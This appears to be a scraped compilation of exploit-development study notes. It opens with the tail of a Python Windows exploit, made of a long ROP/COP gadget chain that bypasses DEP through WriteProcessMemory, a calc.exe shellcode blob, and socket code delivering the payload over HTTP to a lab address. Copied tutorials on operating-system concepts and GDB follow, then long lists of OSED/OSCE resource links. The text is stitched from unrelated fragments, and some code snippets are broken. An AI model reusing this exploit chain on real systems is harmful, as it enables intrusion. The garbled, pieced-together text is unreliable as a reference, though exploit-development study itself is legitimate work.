crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
# Need to first extract sqlite3.dll pointer (which is a pointer to kernel32) and then calculate
offset from kernel32!GetStartupInfoA
# Decrementing ECX by 0x14 firstly (parameter is 0xc bytes in front of ECX. Subtracting ECX by
0xC to place placeholder in ECX. Additionally, the overwrite gadget writes to ECX at an offset of
ECX+0x8. Adding 0x8 more bytes to compensate.)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
# EDI still contains return to stack ROP gadget for COP gadget compensation
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x10015ce5) # sub eax, edx ; ret: ImageLoad.dll (non-ASLR enabled
module)
crash += struct.pack('<L', 0x1002248c) # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x1002248c) # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR
enabled module)
# Popping 0xfffffd2d into EBX (which will be transferred into EDX. After value is in EDX, it will
be added to EAX via EDX)
crash += struct.pack('<L', 0x10022c4c) # xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled
module)
crash += struct.pack('<L', 0x10022c1e) # add edx, ebx ; pop ebx ; retn 0x10: ImageLoad.dll
(non-ASLR enabled module)
crash += struct.pack('<L', 0x10015ce5) # sub eax, edx ; ret: ImageLoad.dll (non-ASLR enabled
module)
crash += struct.pack('<L', 0x90909090) # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090) # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090) # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090) # Compensation for retn 0x10 in previous ROP gadget
# Writing kernel32!WriteProcessMemory address to kernel32!WriteProcessMemory
parameter placeholder
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x10021bfb) # mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-
ASLR enabled module)
# Increasing ECX by 8 bytes, moving it into EAX, and then exchanging EAX with ESP to fire off
the ROP chain!
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x1001fa0d) # mov eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled
module)
crash += struct.pack('<L', 0x61c07ff8) # xchg eax, esp ; ret: sqlite3.dll (non-ASLR enabled
module)
# calc.exe
# 195 bytes
crash += ("\x89\xe5\x83\xec\x20\x31\xdb\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b\x5b"
"\x1c\x8b\x1b\x8b\x1b\x8b\x43\x08\x89\x45\xfc\x8b\x58\x3c\x01\xc3"
"\x8b\x5b\x78\x01\xc3\x8b\x7b\x20\x01\xc7\x89\x7d\xf8\x8b\x4b\x24"
"\x01\xc1\x89\x4d\xf4\x8b\x53\x1c\x01\xc2\x89\x55\xf0\x8b\x53\x14"
"\x89\x55\xec\xeb\x32\x31\xc0\x8b\x55\xec\x8b\x7d\xf8\x8b\x75\x18"
"\x31\xc9\xfc\x8b\x3c\x87\x03\x7d\xfc\x66\x83\xc1\x08\xf3\xa6\x74"
"\x05\x40\x39\xd0\x72\xe4\x8b\x4d\xf4\x8b\x55\xf0\x66\x8b\x04\x41"
"\x8b\x04\x82\x03\x45\xfc\xc3\xba\x78\x78\x65\x63\xc1\xea\x08\x52"
"\x68\x57\x69\x6e\x45\x89\x65\x18\xe8\xb8\xff\xff\xff\x31\xc9\x51"
"\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x89\xe3\x41\x51\x53\xff"
"\xd0\x31\xc9\xb9\x01\x65\x73\x73\xc1\xe9\x08\x51\x68\x50\x72\x6f"
"\x63\x68\x45\x78\x69\x74\x89\x65\x18\xe8\x87\xff\xff\xff\x31\xd2"
"\x52\xff\xd0")
http_request += "Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.130", 80))
s.send(http_request)
s.close()
https://connormcgarr.github.io/ROP2/
Rop Decode
https://www.blackhat.com/docs/us-15/materials/us-15-Xenakis-ROPInjector-Using-Return-
Oriented-Programming-For-Polymorphism-And-Antivirus-Evasion-wp.pdf
https://www.ndss-symposium.org/ndss2015/ndss-2015-posters/korean-shellcode-rop-based-
decoding/
Reversing Engineering
https://www.youtube.com/playlist?list=PLMB3ddm5Yvh3gf_iev78YP5EPzkA3nPdL
Usually the term “operating system” is used, it is in reference to computer software like
macOS, Windows, or a Linux distribution. While this isn’t incorrect, the more accurate
definition of an OS is the software of a computer which runs in kernel mode — when the CPU
can use every feature of its available hardware and execute every instruction in its instruction
set. The OS manages all hardware and software assets, giving computer programs a clean,
abstract set of tools to utilize. In other words, its main function is managing the Input/Output
devices and other system resources to provide its users with an extended (i.e., virtual)
machine.
In the world of computer science and computer engineering education, Operating Systems is
the name of a course which focuses on topics like the stack and the heap, buffer overflow,
system calls, multiprogramming, parallel programming, scheduling, and more. It’s innately
frustrating not just because of its abstract subject material, but also because of how time-
consuming and confusing it can be to debug the kernel in a VM as opposed to developing and
running a high-level C++ program in a more user-friendly IDE. However, in OS there are still
important concepts to learn that are extremely relevant for reverse engineering and malware
analysis.
The following is a collection of information I’ve gathered from when I took an OS class in
undergrad as well as notes from Dennis Yurichev’s famous book on RE which you can find here.
In my Crash Course for Assembly Language, I covered the Stack in general terms; now let’s go
into more detail and compare it to the Heap. This was something I was asked to do in an
interview, so it may be something you could be asked as well if you’re looking for a position in
RE.
To reiterate:
Each active function call has a frame that stores the values of all local variables, and the frames
of all active functions are maintained on the Stack. The Stack is a very important data structure
in memory. In general, it is used to store temporary data needed during the execution of a
program, like local variables and parameters, function return addresses, and more. It is static
memory, meaning it cannot be altered during runtime. Dynamic memory like that allocated
with the malloc() or new() functions is stored on the Heap.
So the Stack often has both local and automatic variables, which are generally pushed to it
when you make procedure calls. These include the parameters you pass in loops and pretty
much anything outside of the global scope except that allocated on the Heap with malloc().
The computer knows which instruction to execute when returning from a procedure because it
makes a call to the Stack.
The Heap is dynamic memory (as mentioned above) and refers to a data structure which
stores global variables. It is not managed automatically by the CPU and, unlike the Stack, can
be fragmented as blocks of memory are allocated and then freed.
• Structure: the Stack is LIFO whereas the Heap is hierarchical (a priority queue)
• Memory: the Stack is contiguous and will never become fragmented, whereas Heap
memory is allocated in any random order and susceptible to fragmentation
• Variables: the Stack only contains local variables while the Heap allows access to
variables globally
System Calls
https://www.linuxbnb.net/wp-content/uploads/2018/06/system-call-overview-1.png
A system call allows a user process to access and execute OS functions inside the kernel. User
programs use syscalls to invoke certain OS services, and common UNIX syscalls include:
• Exec: performs file name resolution, overwrites current processes’ memory space,
moves the program counter, and starts a new program
The syscall handler knows which syscall is being made by referencing the system call table,
which has syscall IDs — indexes that are stored in a particular register, accessed with function
pointers.
Making a system call involves modifying a specific set of files like the syscall table, sys.c (for
syscall function declarations), and the schedule header file. It is a common task for students in
an OS course, but unfortunately not well documented and often takes many hours to figure
out. I may one day in the future post clear instructions on how to do this to save future
students all the trouble, but the above overview will give you a conceptual understanding for
RE.
Buffer Overflow
https://www.imperva.com/learn/wp-content/uploads/sites/13/2018/01/buffer-overflow.png
The buffer is a contiguous section of RAM which temporarily holds data while it is transferred
between an input or output device, compensating for the difference of execution speeds.
Buffer Overflow (or Buffer Overrun) occurs when an application tries to store too much data in
the buffer, which leads to data overflowing into adjacent storage, potentially overwriting the
existing data. This causes data loss and even a system crash. It is a common programming
mistake that most developers unknowingly commit, but nevertheless, hackers can use it to
gain access to sensitive data.
In a buffer overflow attack, the attacker can add extra data that can include malicious
instructions to perform activities like executing shell code, corrupting files, changing data, etc.
There are two types of buffer overflow attacks, those involving Stack-based memory allocation
(which are simpler to exploit), and those that involve Heap-based memory allocation which are
far less frequent. Languages that use Stack-based memory allocation techniques (like C, C++,
Fortran, and Assembly) are the most vulnerable to buffer overflow exploitation.
• Size Allocation: to ensure the buffer has enough memory to handle large volumes of
data
• Avoidance of certain library functions: or third-party methods that are not bound-
checked for buffer overflows, such as gets(), scanf(), or strcpy() found in the C/C++
programming languages
When a program is loaded into memory, it becomes one or more running processes, and
processes are typically independent of each other. Threads, on the other hand, exist as a
subset of a process and therefore use the memory of the process they belong to. This sharing
of memory can lead to parallel programming, which refers to multiple processes or threads
being executed simultaneously (which is only possible on a system with multiple processors).
On a single processor, the CPU is shared among running processes using process scheduling.
This is not parallel programming.
Multiprogramming is the rapid switching of the CPU between multiple processes in memory. It
is commonly used to keep the CPU busy while one or more processes are doing I/O, since only
one program at a time can use the CPU for executing its instructions. The main idea of
multiprogramming is to maximize the use of CPU time and to allow the user to run multiple
programs simultaneously.
If there is no DMA (Direct Memory Access), the CPU would have to run all the programs
sequentially. This would lead to a backup since one would have to finish before the other could
be initiated. Thus, multiprogramming would be less favorable, and a time-sharing
system could be used. In a time-sharing system, multiple users can access and perform
computations simultaneously using their own terminals. All time-sharing systems are
multiprogramming systems, but not all multiprogramming systems are time-sharing systems
since a multiprogramming system may run on a PC with only one user.
There is also spooling, which is a combination of buffering and queuing, and a form of
multiprogramming for the purpose of copying data between devices. It allows programs to
“hand off” work to be done by the peripheral and then proceed to other tasks.
To summarize, if there are 1 or more programs loaded in main memory, only 1 program can
get the CPU for executing its instructions, so multiprogramming maximizes the use of CPU time
by rapidly switching between programs.
Multiprocessing refers to executing multiples processes at the same time, which sounds quite
similar to multiprogramming, but its difference lies in the fact multiprocessing refers to the
hardware (i.e. the CPU units). A system can be both multiprogrammed and multiprocessing by
having several programs running simultaneously with more than one physical processor.
Multitasking, much like its general definition unrelated to computing, refers to having multiple
tasks (programs, processes, threads, etc.) running at the same time. It’s used in modern
operating systems when multiple tasks share a common processing resource (like CPU and
memory). At any time the CPU is executing one task only while other tasks waiting their turn.
The illusion of parallelism is achieved when the CPU is reassigned to another task
(i.e. process or thread context switching).
Multithreading is a model of execution that allows a single process to have multiple code
segments (i.e. threads) run concurrently within that process. Threads are similar to child
processes that share the parent process resources but execute independently. Multiple
threads of a single process can share the CPU in a single CPU system or run in parallel in a
multiprocessing system. Usually this synchronization of threads uses OS primitives like
mutexes and sempaphores.
Multithreading is the best choice when server has a number of distinct tasks to be performed
concurrently.
Miscellaneous
• Paging: makes allocation and free space management easier. A page fault will occur
when you’re trying to access a piece of memory not in RAM
• Trap instruction: kernel-mode set of instructions which causes a switch from user
mode to kernel mode, starting execution at a fixed address in the kernel. It transfers
control to the OS (which then carries out syscalls) before returning control to the
following instruction
• Pipe: can be used to connect two processes so the output from one becomes the input
of the other. Pipes are FIFO and useful for inter-process communication
https://medium.com/reverse-engineering-for-dummies/learning-operating-systems-for-
reverse-engineering-a723dbb5cd6f
https://www.youtube.com/watch?v=U2QVyaufWV4
https://www.immunityinc.com/products/debugger/
https://www.youtube.com/watch?v=eX6rcAIw6s8
This tutorial intends to be beneficial to all developers who want to create reliable and fault-
free software.
A debugger executes several programs and allows the programmer to manage them and
analyze variables if they cause issues.
GDB enables us to execute the program until it reaches a specific point. It can then output the
contents of selected variables at that moment, or walk through the program line by line and
print the values of every parameter after every line executes. It has a command-line interface.
To install the GDB in the Linux system, type in the command to install GDB.
The code I am using for an example here is calculating factorial numbers inaccurately. The aim
is to figure out why the issue occurred.
#include
int n(0);
cin>>n;
long val=factorial(n);
cout<
GCC is a Linux compiler that comes pre-installed in Linux. Use the "g++" command to convert
the source code "test.cpp" into an executable "main." Use "-g flag" so you can debug the code
later as well.
The commands "next" and "step" in GDB execute the code line by line.
Using “watchpoints” is akin to requesting the debugger to give you a constant stream of
information about any modifications to the variables. The software stops when an update
happens and informs you of the specifics of the change.
Here, we set the watchpoints for the calculation's outcome and the input value as it fluctuates.
Last, the results of the watchpoints are analyzed to identify any abnormal activity.
Notice the result in "old" and "new" values. To continuously notice the shift in values, press
the Enter key.
By multiplying the previous value of the result by the "n" value, the result now equals 2. The
first bug has been spotted!
It should assess the outcome by multiplying 3 * 2 * 1. However, the multiplication here begins
at 2. We'll have to alter the loop a little to fix that.
The result is now 0. Another bug!
So, when 0 multiplies with the factorial, how can the output keep the factorial value? It must
be that loop halts before "n" approaches 0.
When "n" values shift to -1, the loop may not execute anymore. Next, call the function. Notice
when a variable is out of scope, watchpoint deletes it.
Examining local variables to determine whether anything unusual has happened might help
you locate the problematic section of your code. Since GDB refers to a line before it runs, the
"print val" command returns a trash value.
To fully comprehend what the debugger is doing, examine the assembly code and what is
happening in memory.
Use the "disass" command to output the list of Assembly instructions. GDB's default
disassembly style is AT&T, which might perplex Windows users as this style is for Linux. If you
don’t prefer this, the disassembly style can be re-set as well.
Execute the "set disassembly-flavor " command to change to the Intel disassembly style.
The logic flow is critical to the success of any program. The flow of Assembly code can be
simple or complicated, based on the compiler and settings used during compiling.
https://medium.com/@securosoft/basic-reverse-engineering-using-gdb-ebfb0afca8f4
https://medium.com/@rickharris_dev/reverse-engineering-using-linux-gdb-a99611ab2d32
https://www.youtube.com/watch?v=nLp3hr6Jf2M
https://www.youtube.com/watch?v=mYY6xHBo4zg
The GNU Debugger or GDB is a powerful debugger which allows for step-by-step execution of a
program. It can be used to trace program execution and is an important part of any reverse
engineering toolkit.
Vanilla GDB
GDB without any modifications is unintuitive and obscures a lot of useful information. The
plug-in pwndb solves a lot of these problems and makes for a much more pleasant experience.
But if you are constrained and have to use vanilla gdb, here are several things to make your life
easier.
Starting GDB
Disassembly
(gdb) disassemble [address/symbol] will display the disassembly for that function/frame
GDB will autocomplete functions, so saying (gdb) disas main suffices if you'd like to see the
disassembly of main
Another handy thing to see while stepping through a program is the disassembly of nearby
instructions:
• [± offset] allows you to specify how you would like the data offset from the current
instruction
Example Usage
This command will show 10 instructions on screen with an offset from the next instruction of
5, giving us this display:
Deleting Views
If for whatever reason, a view no long suits your needs simply call (gdb) info display which will
give you a list of active displays:
1: y /10bi $pc-0x5
Then simply execute (gdb) delete display 1 and your execution will resume without the display.
Registers
In order to view the state of registers with vanilla gdb, you need to run the command info
registers which will display the state of all the registers:
ebx 0x0 0
eflags 0x286 [ PF SF IF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x63 99
If you simply would like to see the contents of a single register, the notation x/x
$[register] where:
Pwndbg
Setting Breakpoints
Setting breakpoints in GDB uses the format b*[Address/Symbol]
Example Usage
Deleting Breakpoints
As before, in order to delete a view, you can list the available breakpoints using (gdb) info
breakpoints (don't forget about GDB's autocomplete, you don't always need to type out every
command!) which will display all breakpoints:
Note
Stepping
What good is a debugger if you can't control where you are going? In order to begin execution
of a program, use the command r [arguments] similar to how if you ran it with dot-slash
notation you would execute it ./program [arguments]. In this case the program will run
normally and if no breakpoints are set, you will execute normally. If you have breakpoints set,
you will stop at that instruction.
• (gdb) step[# of instructions]: Steps into an instruction the specified number of times,
default is 1 (shorthand s)
• (gdb) next instruction [# of instructions]: Steps over an instruction meaning it will not
delve into called functions (shorthand ni)
• (gdb) finish: Finishes a function and breaks after it gets returned (shorthand fin)
Examining
Examining data in GDB is also very useful for seeing how the program is affecting data. The
notation may seem complex at first, but it is flexible and provides powerful functionality.
• x/ means examine
• [format] means how the data should be interpreted such as an instruction i, a string s,
hex bytes x
Example Usage
• (gdb) x/x $rax: Displays the content of the register RAX as hex bytes
Forking
If the program happens to be an accept-and-fork server, gdb will have issues following the
child or parent processes. In order to specify how you want gdb to function you can use the
command set follow-fork-mode [on/off]
Setting Data
If you would like to set data at any point, it is possible using the
command set [Address/Register]=[Hex Data]
Example Usage
Process Mapping
A handy way to find the process's mapped address spaces is to use info proc map:
This will show you where the stack, heap (if there is one), and libc are located.
Attaching Processes
Another useful feature of GDB is to attach to processes which are already running. Simply
launch gdb using gdb, then find the process id of the program you would like to attach to an
execute attach [pid].
https://ctf101.org/reverse-engineering/what-is-gdb/
https://www.udemy.com/course/mips-assembly/
https://www.udemy.com/course/x86-assembly-programming-from-ground-uptm/
https://www.udemy.com/course/complete-x86-assembly-language-120-practical-exercise/
https://www.udemy.com/course/x86-assembly-language-programming-masters-course/
https://www.udemy.com/course/c-programming-for-beginners-programming-in-c/
https://www.udemy.com/course/c-programming-for-beginners-/
https://www.udemy.com/course/the-complete-c-programming-bootcamp/
https://www.udemy.com/course/advanced-c-programming-course/
https://www.udemy.com/course/beginning-c-plus-plus-programming/
https://www.youtube.com/watch?v=8jLOx1hD3_o
https://www.youtube.com/watch?v=GQp1zzTwrIg
https://www.youtube.com/watch?v=oZeezrNHxVo&list=PLIfZMtpPYFP5qaS2RFQxcNVkmJLGQ
wyKE
https://www.auladeanatomia.com/en/anatomia/459/laboratory-assembly
https://www.pentesteracademy.com/video?id=171
Study Material – OSED
• https://github.com/r0r0x-xx/OSED-Pre
• https://github.com/snoopysecurity/OSCE-Prep
• https://github.com/epi052/osed-scripts
• https://www.exploit-db.com/windows-user-mode-exploit-development
• https://github.com/r0r0x-xx/OSED-Pre
• https://github.com/sradley/osed
• https://github.com/Nero22k/Exploit_Development
• https://www.youtube.com/watch?v=7PMw9GIb8Zs
• https://www.youtube.com/watch?v=FH1KptfPLKo
• https://www.youtube.com/watch?v=sOMmzUuwtmc
• https://blog.exploitlab.net/
• https://azeria-labs.com/heap-exploit-development-part-1/
• http://zeroknights.com/getting-started-exploit-lab/
• https://drive.google.com/file/d/1poocO7AOMyBQBtDXvoaZ2dgkq3Zf1Wlb/view?usp=
sharing
• https://drive.google.com/file/d/1qPPs8DHbeJ6YIIjbsC-
ZPMajUeSfXw6N/view?usp=sharing
• https://drive.google.com/file/d/1RdkhmTIvD6H4uTNxWL4FCKISgVUbaupL/view?usp=s
haring
• https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-
based-overflows/
• https://github.com/wtsxDev/Exploit-Development/blob/master/README.md
• https://github.com/corelan/CorelanTraining
• https://github.com/subat0mik/Journey_to_OSCE
• https://github.com/nanotechz9l/Corelan-Exploit-tutorial-part-1-Stack-Based-
Overflows/blob/master/3%20eip_crash.rb
• https://github.com/snoopysecurity/OSCE-Prep
• https://github.com/bigb0sss/OSCE
• https://github.com/epi052/OSCE-exam-practice
• https://github.com/mdisec/osce-preparation
• https://github.com/mohitkhemchandani/OSCE_BIBLE
• https://github.com/FULLSHADE/OSCE
• https://github.com/areyou1or0/OSCE-Exploit-Development
• https://github.com/securityELI/CTP-OSCE
• https://drive.google.com/file/d/1MH9Tv-
YTUVrqgLT3qJDBl8Ww09UyF2Xc/view?usp=sharing
• https://www.coalfire.com/the-coalfire-blog/january-2020/the-basics-of-exploit-
development-1
• https://connormcgarr.github.io/browser1/
• https://kalitut.com/exploit-development-resources/
• https://github.com/0xZ0F/Z0FCourse_ExploitDevelopment
• https://github.com/dest-3/OSED_Resources/
• https://resources.infosecinstitute.com/topic/python-for-exploit-development-
common-vulnerabilities-and-exploits/
• https://www.anitian.com/a-study-in-exploit-development-part-1-setup-and-proof-of-
concept/
• https://samsclass.info/127/127_WWC_2014.shtml
• https://stackoverflow.com/questions/42615124/exploit-development-in-python-3
• https://cd6629.gitbook.io/ctfwriteups/converting-metasploit-modules-to-python
• https://subscription.packtpub.com/book/networking_and_servers/9781785282324/8
• https://www.cybrary.it/video/exploit-development-part-5/
• https://spaceraccoon.dev/rop-and-roll-exp-301-offensive-security-exploit-
development-osed-review-an
• https://help.offensive-security.com/hc/en-us/articles/360052977212-OSED-Exam-
Guide
• https://github.com/epi052/osed-scripts
• https://www.youtube.com/watch?v=0n3Li63PwnQ
• https://epi052.gitlab.io/notes-to-self/blog/2021-06-16-windows-usermode-exploit-
development-review/
• https://pythonrepo.com/repo/epi052-osed-scripts
• https://github.com/dhn/OSEE
• https://pythonrepo.com/repo/epi052-osed-scripts
Reviews
• https://www.youtube.com/watch?v=aWHL9hIKTCA
• https://www.youtube.com/watch?v=62mWZ1xd8eM
• https://ihack4falafel.github.io/Offensive-Security-AWEOSEE-Review/
• https://www.linkedin.com/pulse/advanced-windows-exploitation-osee-review-etizaz-
mohsin-/
• https://animal0day.blogspot.com/2018/11/reviews-for-oscp-osce-osee-and-
corelan.html
• https://addaxsoft.com/blog/offensive-security-advanced-windows-exploitation-awe-
osee-review/
